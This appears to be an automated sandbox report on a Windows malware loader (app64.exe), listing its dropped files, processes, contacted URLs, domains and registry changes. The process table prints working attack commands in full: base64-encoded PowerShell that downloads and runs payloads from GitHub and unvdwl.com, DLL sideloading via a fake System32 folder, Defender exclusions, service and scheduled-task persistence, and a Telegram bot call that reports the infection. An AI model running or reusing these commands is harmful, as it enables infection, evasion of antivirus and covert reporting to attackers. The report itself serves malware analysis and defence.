Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
app64.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\Users\Public\pyld.dll
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Windows \System32\printui.dll (copy)
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\console_zero.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libcrypto-3-x64.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libcurl.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libiconv-2.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libpq.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libssl-3-x64.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\libwinpthread-1.dll
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\ucrtbased.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\usvcldr64.dat
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\x590769.dat
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\zlib1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0r5ospsi.c5g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0swyp3ap.laz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zc5ymzw.ezt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gzgq50c.o2h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dv3xqgw0.pgq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gegny5yv.va2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mptlwbtq.25k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obqft43c.2sw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufofados.ty2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5etfoai.5do.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcgli2be.cwn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuto0a1c.qb1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows \System32\printui.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Windows\System32\libintl-9.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\System32\vcruntime140d.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\System32\winsvcf\winlogsvc
|
data
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_1rdcwa4s.jyw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_35kkapx3.hpw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_3x4mocvr.0sb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_d1xymfdr.5o3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_g1vtdtis.3uo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_gvci3oaz.33r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_jpix12jd.4lt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_rl0fw4jm.d2p.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_rqohwolh.pwu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_rvpyaxvn.ivy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_vi03hvne.t2t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_vimsmrpp.3vx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_vs1u11bs.rcs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_xdtyzoyv.xau.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_znfkk0z4.daa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_zwalieqo.siy.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 39 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\app64.exe
|
"C:\Users\user\Desktop\app64.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0='));
Invoke-Expression $decoded;"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0='));
Invoke-Expression $decoded;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
|
|
|
|
C:\Windows \System32\printui.exe
|
"C:\Windows \System32\printui.exe"
|
|
|
|
C:\Windows \System32\printui.exe
|
"C:\Windows \System32\printui.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw=='));
Invoke-Expression $decoded;"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw=='));
Invoke-Expression $decoded;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath
'%SystemDrive%\Windows\System32';"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters
/v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769
|
|
|
|
C:\Windows\System32\sc.exe
|
sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
|
|
|
|
C:\Windows\System32\reg.exe
|
reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat"
/f
|
|
|
|
C:\Windows\System32\sc.exe
|
sc start x590769
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k DcomLaunch
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
|
|
|
|
C:\Windows\System32\console_zero.exe
|
"C:\Windows\System32\console_zero.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage'
-Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed
success.'});"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage'
-Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed
success.'});"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
|
|
|
|
C:\Windows\System32\console_zero.exe
|
C:\Windows\System32\console_zero.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'E:\'
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'F:\'
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\xcopy.exe
|
xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 14 /nobreak
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 16 /nobreak
|
There are 44 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.dat
|
unknown
|
||
|
https://github.com
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.dat
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagea$
|
unknown
|
||
|
https://ipinfo.io/jsonhardware_manager::download_json_error:
|
unknown
|
||
|
https://dns.google/resolve?name=rootunvdwl.com
|
8.8.8.8
|
||
|
http://crl.microsoftk
|
unknown
|
||
|
https://www.openssl.org/
|
unknown
|
||
|
https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datf
|
unknown
|
||
|
http://194.26.192.52/un2/urestorehard.dat
|
unknown
|
||
|
https://api.telegram.o
|
unknown
|
||
|
https://api.telegram.org/b
|
unknown
|
||
|
https://curl.se/docs/hsts.html
|
unknown
|
||
|
http://github.com
|
unknown
|
||
|
https://curl.se/docs/alt-svc.html#
|
unknown
|
||
|
https://curl.se/
|
unknown
|
||
|
https://github.com/unvd01/unvmai
|
unknown
|
||
|
https://curl.se/docs/hsts.html#
|
unknown
|
||
|
https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datpt:
|
unknown
|
||
|
https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
|
185.199.111.133
|
||
|
https://api.telegram.org/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://ipinfo.io/json
|
34.117.59.81
|
||
|
https://api.telegram.or
|
unknown
|
||
|
https://api.telegram
|
unknown
|
||
|
https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.dat
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.dat
|
unknown
|
||
|
http://www.gnu.org/licenses/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://api.telegram.org/bot7985
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessJO
|
unknown
|
||
|
https://curl.se/docs/http-cookies.html
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage.dll
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage
|
149.154.167.220
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://dns.google/resolve?name=
|
unknown
|
||
|
https://www.gnu.org/licenses/
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.dat
|
unknown
|
||
|
https://curl.se/docs/alt-svc.html
|
unknown
|
||
|
https://dns.google/resolve?name=unvdwl.com
|
8.8.8.8
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
|
140.82.121.4
|
||
|
https://api.telegra
|
unknown
|
||
|
https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/
|
unknown
|
||
|
https://curl.se/docs/copyright.htmlD
|
unknown
|
||
|
http://www.zlib.net/
|
unknown
|
||
|
https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.dat
|
unknown
|
||
|
https://api.telegram.
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://unvdwl.com/un2/botprnt.dat
|
unknown
|
||
|
http://mingw-w64.sourceforge.net/X
|
unknown
|
||
|
https://curl.se/docs/copyright.html
|
unknown
|
||
|
http://www.zlib.net/D
|
unknown
|
||
|
https://api.tele
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://www.openssl.org/H
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
http://unvdwl.com/un2/urestorehard.dat
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://curl.se/docs/http-cookies.html#
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
https://curl.se/V
|
unknown
|
There are 62 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
rootunvdwl.com
|
unknown
|
|
|
|
unvdwl.com
|
194.26.192.52
|
||
|
github.com
|
140.82.121.4
|
||
|
ipinfo.io
|
34.117.59.81
|
||
|
raw.githubusercontent.com
|
185.199.111.133
|
||
|
rootunvbot.com
|
188.116.21.204
|
||
|
dns.google
|
8.8.8.8
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
8.8.8.8
|
dns.google
|
United States
|
||
|
194.26.192.52
|
unvdwl.com
|
Netherlands
|
||
|
34.117.59.81
|
ipinfo.io
|
United States
|
||
|
140.82.121.4
|
github.com
|
United States
|
||
|
188.116.21.204
|
rootunvbot.com
|
Poland
|
||
|
185.199.111.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters
|
ServiceDll
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PrinterInstallation
|
UIEntry
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Power
|
HiberbootEnabled
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
|
DcomLaunch
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A3205D5000
|
heap
|
page read and write
|
||
|
1D8E7B16000
|
heap
|
page read and write
|
||
|
180133D9000
|
trusted library allocation
|
page read and write
|
||
|
7FF8A938D000
|
unkown
|
page read and write
|
||
|
196ADA9000
|
stack
|
page read and write
|
||
|
7FF8B83CB000
|
unkown
|
page readonly
|
||
|
7FF8BA257000
|
unkown
|
page readonly
|
||
|
1D644780000
|
heap
|
page read and write
|
||
|
1F4CA5E8000
|
trusted library allocation
|
page read and write
|
||
|
7FF747100000
|
unkown
|
page readonly
|
||
|
1801B64F000
|
heap
|
page read and write
|
||
|
1FFC55E2000
|
heap
|
page read and write
|
||
|
1801B365000
|
heap
|
page read and write
|
||
|
1801B63E000
|
heap
|
page read and write
|
||
|
16B22C80000
|
heap
|
page read and write
|
||
|
7FF8A7BA8000
|
unkown
|
page execute read
|
||
|
27123017000
|
heap
|
page read and write
|
||
|
1FFC52CE000
|
heap
|
page read and write
|
||
|
1F527940000
|
heap
|
page read and write
|
||
|
1F4D8E51000
|
trusted library allocation
|
page read and write
|
||
|
196F2173000
|
heap
|
page read and write
|
||
|
1FFC530A000
|
heap
|
page read and write
|
||
|
2E63EC30000
|
heap
|
page read and write
|
||
|
1FFC52A3000
|
heap
|
page read and write
|
||
|
7FF847A51000
|
trusted library allocation
|
page read and write
|
||
|
1F5277A0000
|
heap
|
page read and write
|
||
|
1C437738000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
26917EE0000
|
heap
|
page read and write
|
||
|
68296000
|
unkown
|
page read and write
|
||
|
7FF8B83CB000
|
unkown
|
page readonly
|
||
|
2E63ED70000
|
heap
|
page read and write
|
